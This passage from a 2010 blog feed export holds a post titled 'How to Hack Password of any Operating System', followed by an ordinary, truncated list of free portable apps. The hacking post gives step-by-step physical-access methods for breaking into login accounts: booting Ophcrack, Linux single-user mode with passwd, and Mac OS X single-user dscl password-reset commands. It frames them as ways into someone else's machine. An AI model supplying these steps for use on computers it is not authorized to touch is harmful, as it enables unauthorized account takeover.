Desai</name><uri>https://profiles.google.com/113764229296536180787</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh3.googleusercontent.com/-mwPtY6WfIYE/AAAAAAAAAAI/AAAAAAAABkg/egEA8NIG5as/s512-c/photo.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://nelsondesai.blogspot.com/2010/03/8-hidden-firefox-secrets-revealed.html</feedburner:origLink></entry><entry gd:etag="W/&quot;AkMASHk7fip7ImA9WxBUFUk.&quot;"><id>tag:blogger.com,1999:blog-9099073570000665072.post-2498348559611535724</id><published>2010-03-02T08:47:00.000-08:00</published><updated>2010-03-02T08:47:29.706-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-03-02T08:47:29.706-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Cool Tricks" /><title>How to Hack Password of any Operating System</title><content type="html">&lt;div style="text-align: justify;"&gt;&lt;a href="http://www.hungry-hackers.com/wp-content/uploads/2009/12/logo.png"&gt;&lt;img alt="" class="alignleft size-full wp-image-1199" height="110" src="http://www.hungry-hackers.com/wp-content/uploads/2009/12/logo.png" title="logo" width="147" /&gt;&lt;/a&gt;One thing any hacker should know is  how to hack into login account of any operating system. Major Operating  Systems that are used these days are Windows, Linux and Mac. So today I  will show you how to hack into these Operating Systems.&amp;nbsp;Are you curious  how easy it is for someone to gain access to your computer? If so, read  on to see the technique one might use to figure out your computer  password.&lt;/div&gt;&lt;h3 style="text-align: justify;"&gt;Windows&lt;/h3&gt;&lt;div style="text-align: justify;"&gt;Windows being very popular has a lot of  programs available which can be used to hack the login password. One of  the most successful &amp;nbsp;program is Ophcrack, and it is free. Ophcrack is  based on Slackware, and uses rainbow tables to solve passwords up to 14  characters in length. The time required to solve a password? Generally  10 seconds. The expertise needed? None.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Simply download the Ophcrack ISO and  burn it to a CD (or load it onto a USB drive via UNetbootin). Insert the  CD into a machine you would like to gain access to, then press and hold  the power button until the computer shuts down. Turn the computer back  on and enter BIOS at startup. Change the boot sequence to CD before HDD,  then save and exit.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;The computer will restart and Ophcrack  will be loaded. Sit back and watch as it does all the work for your.  Write down the password it gives you, remove the disc, restart the  computer, and log in as if it were you own machine.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;You can download OphCrack from the  following link:&lt;/div&gt;&lt;blockquote style="text-align: justify;"&gt;http://ophcrack.sourceforge.net/&lt;/blockquote&gt;&lt;h3 style="text-align: justify;"&gt;Linux&lt;/h3&gt;&lt;div style="text-align: justify;"&gt;Linux is an operating system which is  quickly gaining popularity in mainstream, but not so common that you’re  likely to come across it. Though Mac and Linux are both based on Unix,  it is easier to change the password in Linux than it is OS X.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;To change the password, turn on the  computer and press the ESC key when GRUB appears. Scroll down and  highlight ‘Recovery Mode’ and press the ‘B’ key; this will cause you to  enter ‘Single User Mode’.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;You’re now at the prompt, and logged in  as ‘root’ by default. Type ‘passwd’ and then choose a new password. This  will change the root password to whatever you enter. If you’re  interested in only gaining access to a single account on the system,  however, then type ‘passwd username’ replacing ‘username’ with the login  name for the account you would like to alter the password for.&lt;/div&gt;&lt;h3 style="text-align: justify;"&gt;Mac&lt;/h3&gt;&lt;div style="text-align: justify;"&gt;Finally we take on Mac’s OS X which as  we said earlier is based on Unix and is difficult to change password  compared to Linux but nothing is &amp;nbsp;impossible to be hacked.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;The easiest method would be to use  Ophcrack on this also as it works with Mac and Linux in addition to  Windows. However, there are other methods that can be used, as  demonstrated below.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;If the Mac runs OS X 10.4, then you only  need the installation CD. Insert it into the computer, reboot. When it  starts up, select UTILITIES &amp;gt; RESET PASSWORD. Choose a new password  and then use that to log in.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;If the Mac runs OS X 10.5, restart the  computer and press COMMAND + S. When at the prompt, type:&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;strong&gt;fsck -fy&lt;/strong&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;strong&gt;mount -uw /&lt;/strong&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;strong&gt;launchctl load  /System/Library/LaunchDaemons/com.apple.DirectoryServices.plist&lt;/strong&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;strong&gt;dscl . -passwd /Users/UserName  newpassword&lt;/strong&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;That’s it. Now that the password is  reset, you can login.&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;Thank you for your feedback.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9099073570000665072-2498348559611535724?l=nelsondesai.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/KBh8bafaDOZs4CyV-AJjc1Ai0kM/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/KBh8bafaDOZs4CyV-AJjc1Ai0kM/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/KBh8bafaDOZs4CyV-AJjc1Ai0kM/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/KBh8bafaDOZs4CyV-AJjc1Ai0kM/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/NelsonDesai/~4/PcFuqd_6Dbw" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://nelsondesai.blogspot.com/feeds/2498348559611535724/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://nelsondesai.blogspot.com/2010/03/how-to-hack-password-of-any-operating.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/9099073570000665072/posts/default/2498348559611535724?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/9099073570000665072/posts/default/2498348559611535724?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/NelsonDesai/~3/PcFuqd_6Dbw/how-to-hack-password-of-any-operating.html" title="How to Hack Password of any Operating System" /><author><name>Nelson Desai</name><uri>https://profiles.google.com/113764229296536180787</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh3.googleusercontent.com/-mwPtY6WfIYE/AAAAAAAAAAI/AAAAAAAABkg/egEA8NIG5as/s512-c/photo.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://nelsondesai.blogspot.com/2010/03/how-to-hack-password-of-any-operating.html</feedburner:origLink></entry><entry gd:etag="W/&quot;AkUMQnY8cSp7ImA9WxBUFUk.&quot;"><id>tag:blogger.com,1999:blog-9099073570000665072.post-4981172854503128581</id><published>2010-03-02T08:44:00.000-08:00</published><updated>2010-03-02T08:44:43.879-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-03-02T08:44:43.879-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Cool Tricks" /><title>100+ Free Portable Apps</title><content type="html">&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://www.hungry-hackers.com/wp-content/uploads/2009/12/portable.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://www.hungry-hackers.com/wp-content/uploads/2009/12/portable.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;This stuff can be installed on any  portable drive, i.e. USB thumbdrive, PDA or an iPod. You can use them at  work, school, or any other place where you can plugin your device.  Check them out, you can either scroll-down for relevant category, i.e  office software, email tools, messengers, games, etc. or get a  ‘all-in-one’ package (all essential tools) . While there are more apps  for windows users, I tried to include a mac version for each essential  tool. All free. Enjoy! &lt;br /&gt;
&lt;blockquote&gt; &lt;div style="text-align: justify;"&gt;&lt;strong&gt;What is a portable program ?&lt;/strong&gt;  : A portable program is a piece of software that you can carry around  with you on a portable device and use on any other computer. It can be  your email program, your browser, system recovery tools or even an  operating system. The coolest part about it, is that all of your data  and settings are always stored on a thumbdrive so when you unplug the  device, none of&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; your personal data is left behind.&lt;/div&gt;&lt;/blockquote&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="color: #4088b8;"&gt;&lt;strong&gt;Portable  Office Software&lt;/strong&gt;&lt;/span&gt;&lt;/div&gt;&lt;ul&gt;&lt;li&gt;Abiword [&lt;a href="http://portableapps.com/apps/office/abiword_portable" target="_blank" title="portable word processor"&gt;Win&lt;/a&gt; (6.3 mb) / &lt;a href="http://www.freesmug.org/portableapps/abiword/" target="_blank" title="portable word for Mac"&gt;Mac&lt;/a&gt;  (9.5 mb)] – word processor (compatible with Microsoft word)&lt;/li&gt;
&lt;li&gt;OpenOffice [&lt;a href="http://portableapps.com/apps/office/openoffice_portable" target="_blank" title="open office portable"&gt;Win&lt;/a&gt; (65 mb) / &lt;a href="http://www.freesmug.org/portableapps/openoffice/" target="_blank" title="portable open office for 
Mac"&gt;Mac&lt;/a&gt; (127 mb)] – free alternative to Microsoft Office  (fully compatible with Microsoft Office docs)&lt;/li&gt;
&lt;li&gt;PDF Viewers: &lt;a href="http://portableapps.com/apps/office/sumatra_pdf_portable" target="_blank" title="pdf viewer"&gt;Sumatra&lt;/a&gt; [Win (1.1 mb) ], &lt;a href="http://www.snapfiles.com/get/foxitpdf.html" target="_blank"&gt;Foxit  PDF Reader&lt;/a&gt; [Win, (1.8 mb) ]&lt;/li&gt;
&lt;li&gt;&lt;a href="http://notepad-plus.sourceforge.net/uk/site.htm"&gt;Notepad ++&lt;/a&gt;  – feature-rich Notepad replacement.&lt;/li&gt;
&lt;/ul&gt;&lt;strong&gt;&lt;span style="color: #4088b8;"&gt;Portable  Email/Calendar/ToDo Programs&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;
&lt;ul&gt;&lt;li&gt;Mozilla ThunderBird – [&lt;a href="http://portableapps.com/apps/internet/thunderbird_portable" target="_blank" title="mozilla thunderbird client"&gt;Win&lt;/a&gt; (6 mb), &lt;a href="http://www.freesmug.org/portableapps/thunderbird/" target="_blank" title="portable mozilla thunderbird 
for Mac"&gt;Mac&lt;/a&gt; (20.5 mb), &lt;a href="http://www.theplaceforitall.com/portablethunderbird/" target="_blank"&gt;Cross-Platform&lt;/a&gt; (Win, Mac)] – very &lt;a href="http://www.makeuseof.com/tag/switching-to-mozilla-thunderbird/"&gt;good  email client&lt;/a&gt; (built-in address book, import/export, &lt;a href="https://addons.mozilla.org/en-US/thunderbird/recommended"&gt;tons of  addons&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;Calendars: &lt;a href="http://portableapps.com/apps/office/sunbird_portable" target="_blank" title="portable calendar and todo"&gt;Mozilla Sunbird&lt;/a&gt; [Win, 5.6mb], &lt;a href="http://www.freesmug.org/portableapps/sunbird/" target="_blank" title="portable 
calendar for Mac"&gt;Sunbird&lt;/a&gt; [Mac, 9.7mb], &lt;a href="http://portableapps.com/apps/office/lightning_extension" target="_blank"&gt;Lightning&lt;/a&gt; [Win, 1.3mb) - ThunderBird addon&lt;/li&gt;
&lt;li&gt;&lt;a href="http://osxportableapps.sourceforge.net/p_mail/index.html" target="_blank"&gt;Mail&lt;/a&gt; [Mac] – requires locally installed Mail.app&lt;/li&gt;
&lt;li&gt;&lt;a href="http://osxportableapps.sourceforge.net/p_ical/index.html" target="_blank" title="portable iCal"&gt;iCal&lt;/a&gt; [Mac] – requires locally installed iCal.app&lt;/li&gt;
&lt;li&gt;&lt;a href="http://osxportableapps.sourceforge.net/p_addressbook/index.html" target="_blank"&gt;Address Book&lt;/a&gt; [Mac] – requires locally installed  Address Book&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.snapfiles.com/get/qm.html" target="_blank" title="portable mailer"&gt;Quick Mailer&lt;/a&gt;  [Win, 20kb] – tiny program for sending quick e-mail messages&lt;/li&gt;
&lt;li&gt;&lt;a href="http://gdisk.sourceforge.net/" target="_blank" title="gmail drive"&gt;gDisk&lt;/a&gt; [Mac, 1020kb] – handy program that turns your  gmail account into a portable hard drive. (More &lt;a href="http://www.makeuseof.com/tag/gmail-craze-30-tools-to-make-your-gmail-better/"&gt;stuff  for gmail&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;&lt;strong&gt;&lt;span style="color: #4088b8;"&gt;Portable Text and  Voice Messengers&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;
&lt;ul&gt;&lt;li&gt;All-in-One (Yahoo, MSN, ICQ, etc.): &lt;a href="http://portableapps.com/apps/internet/gaim_portable" target="_blank" title="portable gaim"&gt;Gaim&lt;/a&gt; [Win, 6.9 mb], &lt;a href="http://portableapps.com/apps/internet/miranda_portable" target="_blank"&gt;Miranda IM&lt;/a&gt; [Win, 1.2 mb], &lt;a href="http://www.freesmug.org/portableapps/adium/" target="_blank"&gt;Adium&lt;/a&gt;  [Mac, 15.5mb], &lt;a href="http://www.trilliananywhere.com/" target="_blank" title="portable trillian"&gt;Trillian&lt;/a&gt;  [Win]&lt;/li&gt;
&lt;li&gt;&lt;a href="http://osxportableapps.sourceforge.net/p_ichat/index.html" target="_blank" title="portable iChat"&gt;iChat&lt;/a&gt; [Mac] – requires locally installed iChat&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.freesmug.org/portableapps/newspeak/" target="_blank" title="portable IRC client"&gt;Newspeak&lt;/a&gt;  [Mac, 1mb] – Newspeak Cocoa IRC client&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.gruups.com/usbskype/" target="_blank"&gt;Skype&lt;/a&gt; –  exlpains how to make skype portable&lt;/li&gt;
&lt;/ul&gt;&lt;strong&gt;&lt;span style="color: #4088b8;"&gt;Portable Media Tools  (Audio / Video)&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;
&lt;ul&gt;&lt;li&gt;Audacity [&lt;a href="http://portableapps.com/apps/music_video/audacity_portable" target="_blank" title="audio editor and recorder"&gt;Win&lt;/a&gt; (2.4 mb), &lt;a href="http://www.freesmug.org/portableapps/audacity/" target="_blank" title="portable audio editor for 
Mac"&gt;Mac&lt;/a&gt; (5mb)] – simple audio editor and recorder&lt;/li&gt;
&lt;li&gt;VLC [&lt;a href="http://portableapps.com/apps/music_video/vlc_portable" target="_blank" title="portable video player"&gt;Win&lt;/a&gt; (9.3 mb), &lt;a href="http://www.freesmug.org/portableapps/vlc/" target="_blank" title="portable video player for 
Mac"&gt;Mac&lt;/a&gt;  (24 mb)] –  powerful media player that plays almost all popular audio  and video formats&lt;/li&gt;
&lt;li&gt;&lt;a href="http://jeanmatthieu.free.fr/ishout/index.html" target="_blank"&gt;iShout&lt;/a&gt; [Mac, 7mb] – record and listen to your  favorite internet radios.&lt;/li&gt;
&lt;li&gt;&lt;a href="http://jeanmatthieu.free.fr/cocoajt/index.html" target="_blank"&gt;CocoaJT&lt;/a&gt; [Mac, 8.7mb] – stream live TV programs from  major broadcast channels.&lt;/li&gt;
&lt;/ul&gt;&lt;strong&gt;&lt;span style="color: #4088b8;"&gt;Portable Graphics  Viewers and Image Editors&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;
&lt;ul&gt;&lt;li&gt;GIMP [&lt;a href="http://portableapps.com/apps/graphics_pictures/gimp_portable" target="_blank" title="portable image editor"&gt;Win&lt;/a&gt; (8.6 mb), &lt;a href="http://www.freesmug.org/portableapps/gimp/" target="_blank" title="portable GIMP for Mac users"&gt;Mac&lt;/a&gt;  (87.5 mb)] – free alternative to Photoshop&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.irfanview.com/" target="_blank"&gt;IrfanView&lt;/a&gt;  [Win, 1013kb] – fast graphic viewer with basic image editing features&lt;/li&gt;
&lt;li&gt;&lt;a href="http://perso.orange.fr/pierre.g/xnview/enxnview.html" target="_blank" title="image viewer and converter"&gt;XNView&lt;/a&gt; [Win, Mac, Linux] – image viewer and  converter (supports more then 400 image formats)&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.freesmug.org/portableapps/inkscape/" target="_blank"&gt;Inkscape&lt;/a&gt; [Mac, 24.6mb] – scalable vector graphics  editor&lt;/li&gt;
&lt;/ul&gt;&lt;strong&gt;&lt;span style="color: #4088b8;"&gt;Portable Browsers and  Internet Tools (FTP, Feedreaders, Torrent Clients…)&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;
&lt;ul&gt;&lt;li&gt;Firefox [&lt;a href="http://portableapps.com/apps/internet/firefox_portable" target="_blank" title="portable firefox"&gt;Win&lt;/a&gt; (5.8 mb), &lt;a href="http://www.freesmug.org/portableapps/firefox/" target="_blank"&gt;Mac&lt;/a&gt;  (21.9mb), &lt;a href="http://www.theplaceforitall.com/portablefirefox/" target="_blank"&gt;Cross-platform&lt;/a&gt; (Win, Mac) ]&lt;/li&gt;
&lt;li&gt;Other browsers: &lt;a href="http://www.freesmug.org/portableapps/camino/" target="_blank"&gt;Camino&lt;/a&gt;  [Mac, 16.2mb], &lt;a href="http://www.opera-usb.com/operausben.htm" target="_blank" title="portable Opera"&gt;Opera&lt;/a&gt;  [Win], &lt;a href="http://osxportableapps.sourceforge.net/p_safari/index.html" target="_blank" title="portable Safari"&gt;Safari&lt;/a&gt; [Mac] –  requires installed safari&lt;/li&gt;
&lt;li&gt;Feedreaders (RSS, Atom …): &lt;a href="http://www.freesmug.org/portableapps/rssowl/" target="_blank"&gt;RSSOwl&lt;/a&gt;  [Mac, 5mb], &lt;a href="http://www.freesmug.org/portableapps/feed/" target="_blank"&gt;Feed&lt;/a&gt; [Mac, 564kb], &lt;a href="http://www.snapfiles.com/get/greatnews.html" target="_blank"&gt;GreatNews&lt;/a&gt;  [Win], &lt;a href="http://portableapps.com/apps/internet/sage_extension" target="_blank" title="portable rss reader"&gt;Sage&lt;/a&gt; [Win, 0.2 mb]&lt;/li&gt;
&lt;li&gt;FTP Clients: &lt;a href="http://portableapps.com/apps/internet/filezilla_portable" target="_blank" title="portable FTP client"&gt;Filezilla&lt;/a&gt; [Win, 2.3 mb], &lt;a href="http://portableapps.com/apps/internet/fireftp_extension" target="_blank"&gt;FireFTP&lt;/a&gt; [Win, 0.1mb], &lt;a href="http://www.freesmug.org/portableapps/cyberduck/" target="_blank"&gt;CyberDuck&lt;/a&gt;  [Mac, 9.9mb]&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.snapfiles.com/get/trayurl.html" target="_blank"&gt;TrayURL&lt;/a&gt;  [Win] – bookmark manager&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.utorrent.com/download.php" target="_blank" title="portable torrent client"&gt;uTorrent&lt;/a&gt;  [Win] – popular torrent downloader&lt;/li&gt;
&lt;/ul&gt;&lt;span style="color: #4088b8;"&gt;&lt;strong&gt;Portable Security  Software&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;
&lt;ul&gt;&lt;li&gt;Antivirus: &lt;a href="http://portableapps.com/apps/utilities/keepass_portable" target="_blank" title="password storage"&gt;ClamWin&lt;/a&gt; [Win, 5.9mb], &lt;a href="http://www.snapfiles.com/get/cureit.html" target="_blank" title="portable antivirus"&gt;Dr.Web  CureIt&lt;/a&gt; [Win, 5.5 mb]&lt;/li&gt;
&lt;li&gt;&lt;a href="http://portableapps.com/apps/utilities/keepass_portable" target="_blank" title="password collector"&gt;Keepass Password&lt;/a&gt; [Win, 1mb] – securely store and  manage your passwords&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.snapfiles.com/get/omziff.html" target="_blank"&gt;Omziff&lt;/a&gt;  [Win, 0.5mb] – lets you encrypt/decrypt a file, using secure encryption  algorithms. Also includes a password generator, file shredder, file  splitter and some more tools.&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.steganos.com/?content=locknote&amp;amp;language=en" target="_blank"&gt;LockNote&lt;/a&gt; [Win] – simple text file that lets you  store sensitive info with 256bit password encryption.&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.snapfiles.com/get/pass2go.html" target="_blank" title="portable password manager"&gt;RoboFor2Go&lt;/a&gt;  [Win] – secure password manager and form filler&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.snapfiles.com/get/smartsniff.html" target="_blank"&gt;Smart Sniff&lt;/a&gt; [Win, 57kb] – lets you inspect network  traffic that passes via your network adapter.&lt;/li&gt;
&lt;/ul&gt;&lt;span style="color: #4088b8;"&gt;&lt;strong&gt;Portable Games&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;
&lt;ul&gt;&lt;li&gt;&lt;a href="http://portableapps.com/apps/games/sudoku_portable" target="_blank" title="portable games"&gt;Sudoku&lt;/a&gt; – popular  puzzle game&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.doob.de/Bricks2000" target="_blank" title="portable tetris game"&gt;Bricks2000&lt;/a&gt; – popular tetris clone&lt;/li&gt;
&lt;li&gt;&lt;a href="http://stuff.goatdairying.com/programs/games/games.html" target="_blank"&gt;Logix&lt;/a&gt; – something similar to minesweeper&lt;/li&gt;
&lt;li&gt;&lt;a href="http://generally.cjb.net/" target="_blank" title="portable USB game"&gt;GeneRally&lt;/a&gt; – 2D racing game&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.mayothi.com/nagaskaki.html" target="_blank"&gt;Nagaskaki&lt;/a&gt;  – chess game&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.cylog.org/games_4.asp" target="_blank"&gt;NarkoMania&lt;/a&gt;  – cool minesweeper clone&lt;/li&gt;
&lt;li&gt;&lt;a href="http://icculus.org/neverball/" target="_blank"&gt;NeverBall&lt;/a&gt;  – part puzzle, part action game&lt;/li&gt;
&lt;/ul&gt;&lt;span style="color: #4088b8;"&gt;&lt;strong&gt;Other Portable  Utilities&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;
&lt;ul&gt;&lt;li&gt;&lt;a href="http://portableapps.com/apps/utilities/7-zip_portable" target="_blank" title="portable archive utility"&gt;7Zip&lt;/a&gt; [Win, 1.1 mb] – file archiver and compressor,   supports 7z, ZIP, GZIP, BZIP2, TAR, RAR and more&lt;/li&gt;
&lt;li&gt;&lt;a href="http://mikicun.blogsome.com/2007/04/03/registry-tweaker-v212280-thinstalled/" target="_blank"&gt;Registry Tweaker&lt;/a&gt; [Win, 1.52mb] – registry tweaking  tool&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.snapfiles.com/reviews/Restoration/restoration.html" target="_blank" title="portable file recovery tool"&gt;Restoration&lt;/a&gt; [Win, 229kb] – handy program for  recovering deleted (or formatted) files&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.snapfiles.com/get/yamipod.html" target="_blank" title="standalone ipod manager"&gt;YamiPod&lt;/a&gt;  [Win] – powerful iPod manager (copy mp3/AAC files to and from your  iPod, import/export playlists, search for songs, remove duplicates,..).  More &lt;a href="http://www.makeuseof.com/tag/15-ways-to-tools-your-ipod-better/"&gt;iPod  tools&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.snapfiles.com/get/andrivemanager.html" target="_blank"&gt;Drive Manager&lt;/a&gt; [Win, 1191 kb] – quick summary for  each local and removable drive.&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.pegtop.net/start/" target="_blank"&gt;PStart&lt;/a&gt; –  lets you organize and create menu-like list for quicker access to your  portable programs.&lt;/li&gt;
&lt;li&gt;&lt;a href="http://osxportableapps.sourceforge.net/syncpappx/index.html" target="_blank"&gt;SyncPAppX&lt;/a&gt; – script that syncs preferences between  portable and local applications.&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.portablefreeware.com/?id=1270" target="_blank"&gt;RQ  Money&lt;/a&gt; – handy utlity to manage your credits and debts&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.gtopala.com/siw-download.html" target="_blank"&gt;SIW&lt;/a&gt;  – a system analysis tool that tells you almost everything you need to  know about a computer, i.e. hardware, configuration settings, etc.&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.pxserver.com/WinAudit.htm" target="_blank"&gt;WinAudit&lt;/a&gt;  – one more analysis tool&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.snapfiles.com/get/convert.html" target="_blank" title="portable unit converter"&gt;Convert&lt;/a&gt;  [Win, 155 kb] – fast metric unit conversion tool (distance,  temperature, volume, time, speed, mass…)&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.snapfiles.com/get/kalender.html" target="_blank"&gt;UK  Calender&lt;/a&gt; [Win, 321kb] – straightforward calendar with ToDo and  reminders&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.cpuid.com/cpuz.php" target="_blank"&gt;CPU-Z&lt;/a&gt;  [Win] – provides detailed info about your processor and other components&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.snapfiles.com/get/ccodes.html" target="_blank"&gt;Country  Codes&lt;/a&gt; [Win, 1358 kb] – a small database of country codes and  additional information for all countries.&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.snapfiles.com/get/treepad.html" target="_blank"&gt;TreePad  Lite&lt;/a&gt; [Win, 866kb] – personal database program, lets you store all  your notes, emails, bookmarks, etc. into one well-structured file&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.snapfiles.com/get/startuplist.html" target="_blank"&gt;StartupList&lt;/a&gt; [Win, 158 kb] – displays all items that  are in any way related to your computer startup and are executed without  any user interactions&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.snapfiles.com/get/extextreader.html" target="_blank"&gt;eTextReader&lt;/a&gt; [Win, 279kb] – read plain text files  provided by Project Gutenberg in a book-like manner.&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.portablefreeware.com/?id=1177" target="_blank"&gt;Index  Your Files&lt;/a&gt; [Win, 640kb] – provides an easy way to create index  databases (of specified folders and drives) for quick file/term search&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.snapfiles.com/get/rockxp.html" target="_blank"&gt;RockXP&lt;/a&gt;  [win, 768kb] – handy utility for retrieving Win XP’s product key&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.snapfiles.com/get/WhoisThisDomain.html" target="_blank" title="portable domain lookup tool"&gt;WhoisThisDomain&lt;/a&gt;  [Win, 42kb] – view owner and registration info for any domain name&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.snapfiles.com/get/convert.html" target="_blank" title="portable unit converter"&gt;Converter&lt;/a&gt;  – portable unit convertsion utility&lt;/li&gt;
&lt;/ul&gt;&lt;span style="color: #4088b8;"&gt;&lt;strong&gt;Portable Developer  Tools (Techies Only)&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;
&lt;ul&gt;&lt;li&gt;Nvu [&lt;a href="http://portableapps.com/apps/development/nvu_portable" target="_blank" title="portable webpage editor"&gt;Win&lt;/a&gt; (7.3 mb), &lt;a href="http://www.freesmug.org/portableapps/nvu/" target="_blank"&gt;Mac&lt;/a&gt;  (12 mb)] –  easy-to-use webpage editor. Simpler alternative to  Dreamweaver and Microsft Frontpage&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.server2go-web.de/download/download.html" target="_blank"&gt;Server2Go&lt;/a&gt; – apache webserver (no configurations  needed)&lt;/li&gt;
&lt;li&gt;&lt;a href="http://rubyforge.org/projects/instantrails/" target="_blank"&gt;InstantRails&lt;/a&gt;[Win, 60mb] – contains Ruby, Rails,  Apache, and MySQL, all preconfigured and ready to run.&lt;/li&gt;
&lt;li&gt;&lt;a href="http://portableapps.com/apps/internet/putty_portable" target="_blank" title="portable putty"&gt;Putty&lt;/a&gt; [Win, 0.9 mb] – lightweight telnet and SSH  client&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.fmip.org/download.php" target="_blank"&gt;Follow-Me  IP&lt;/a&gt; – displays your external IP address&lt;/li&gt;
&lt;li&gt;&lt;a href="http://portableapps.com/apps/development/xampp" target="_blank" title="portable server"&gt;XAMPP&lt;/a&gt;  [Win, 25/17 mb] – integrated server package of Apache, mySQL, PHP and  Perl. Just Unzip and Run&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.snapfiles.com/get/hfs.html" target="_blank"&gt;HTTP  File Server&lt;/a&gt; [Win] – simple and easy-to-use file server for personal  file sharing.&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.snapfiles.com/get/cports.html" target="_blank"&gt;CurrPorts&lt;/a&gt;  [Win, 46kb]- lets you view a list of ports that are currently in use,  along with applications that use them&lt;/li&gt;
&lt;li&gt;FTP Servers: &lt;a href="http://www.snapfiles.com/get/quickeasyftpserver.html" target="_blank"&gt;Quick’n Easy FTP Server&lt;/a&gt; [Win, 355kb], &lt;a href="http://jeanmatthieu.free.fr/pureftpd/index.html" target="_blank"&gt;PureFTPdManager&lt;/a&gt;  [Mac, 10.9mb]&lt;/li&gt;
&lt;/ul&gt;&lt;span style="color: #4088b8;"&gt;&lt;strong&gt;All-In-One Packages&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;
&lt;ul&gt;&lt;li&gt;&lt;a href="http://portableapps.com/suite" target="_blank" title="collection of portable software"&gt;PortableApps Suite&lt;/a&gt;  [Win, 89.5mb] – includes 7 programs for essential needs (office, email,  IM client, etc.) + cool Startup manager and backup utility&lt;/li&gt;
